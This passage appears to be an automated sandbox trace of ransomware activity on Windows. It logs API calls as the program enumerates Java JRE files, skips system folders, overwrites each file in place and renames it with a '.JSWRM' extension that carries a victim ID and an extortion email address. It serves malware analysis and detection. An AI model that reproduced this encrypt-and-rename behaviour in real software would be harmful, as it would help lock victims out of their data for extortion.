lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0071.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0071.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0071.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0071.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0071.467] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="trusted.libraries", cAlternateFileName="TRUSTE~1.LIB")) returned 1 [0071.467] lstrcmpiW (lpString1="trusted.libraries", lpString2=".") returned 1 [0071.467] lstrcmpiW (lpString1="trusted.libraries", lpString2="..") returned 1 [0071.467] lstrcmpiW (lpString1="trusted.libraries", lpString2="...") returned 1 [0071.467] lstrcmpiW (lpString1="trusted.libraries", lpString2="windows") returned -1 [0071.467] lstrcmpiW (lpString1="trusted.libraries", lpString2="recovery") returned 1 [0071.468] lstrcmpiW (lpString1="trusted.libraries", lpString2="perflogs") returned 1 [0071.468] lstrcmpiW (lpString1="trusted.libraries", lpString2="documents and settings") returned 1 [0071.468] lstrcmpiW (lpString1="trusted.libraries", lpString2="$RECYCLE.BIN") returned 1 [0071.468] lstrcmpiW (lpString1="trusted.libraries", lpString2="system volume information") returned 1 [0071.468] lstrcmpiW (lpString1="trusted.libraries", lpString2="msocache") returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trusted.libraries", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trusted.libraries", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trusted.libraries", lpUsedDefaultChar=0x0) returned 17 [0071.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trusted.libraries", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trusted.libraries", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trusted.libraries", lpUsedDefaultChar=0x0) returned 17 [0071.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0071.468] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.590] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=0) returned 1 [0071.590] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23b928 [0071.591] ReadFile (in: hFile=0x458, lpBuffer=0x23b928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 1 [0071.591] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.591] WriteFile (in: hFile=0x458, lpBuffer=0x23b928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesWritten=0x345e898*=0x0, lpOverlapped=0x0) returned 1 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b928 | out: hHeap=0x1e0000) returned 1 [0071.591] CloseHandle (hObject=0x458) returned 1 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0071.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0071.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0071.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.591] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0071.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0071.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0071.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0071.592] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="US_export_policy.jar", cAlternateFileName="US_EXP~1.JAR")) returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2=".") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="..") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="...") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="windows") returned -1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="recovery") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="perflogs") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="documents and settings") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="$RECYCLE.BIN") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="system volume information") returned 1 [0071.592] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="msocache") returned 1 [0071.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0071.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x240f70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="US_export_policy.jar", lpUsedDefaultChar=0x0) returned 20 [0071.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="US_export_policy.jar", lpUsedDefaultChar=0x0) returned 20 [0071.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0071.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.593] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.593] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3026) returned 1 [0071.593] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbd0) returned 0x24e1e0 [0071.593] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.595] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0071.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0071.595] CloseHandle (hObject=0x458) returned 1 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0071.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0071.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0071.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0071.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0071.596] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="US_export_policy.jar", cAlternateFileName="US_EXP~1.JAR")) returned 0 [0071.596] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0071.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.596] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0071.596] lstrcmpiW (lpString1="sound.properties", lpString2=".") returned 1 [0071.596] lstrcmpiW (lpString1="sound.properties", lpString2="..") returned 1 [0071.596] lstrcmpiW (lpString1="sound.properties", lpString2="...") returned 1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="windows") returned -1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="recovery") returned 1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="perflogs") returned 1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="documents and settings") returned 1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="$RECYCLE.BIN") returned 1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="system volume information") returned -1 [0071.597] lstrcmpiW (lpString1="sound.properties", lpString2="msocache") returned 1 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sound.properties", lpUsedDefaultChar=0x0) returned 16 [0071.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sound.properties", lpUsedDefaultChar=0x0) returned 16 [0071.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0071.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0071.597] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.597] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1210) returned 1 [0071.597] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b0) returned 0x203550 [0071.597] ReadFile (in: hFile=0x454, lpBuffer=0x203550, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ec04*=0x4b0, lpOverlapped=0x0) returned 1 [0071.599] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.599] WriteFile (in: hFile=0x454, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ec00*=0x4b0, lpOverlapped=0x0) returned 1 [0071.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0071.599] CloseHandle (hObject=0x454) returned 1 [0071.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.599] MultiByteToWideChar (in: 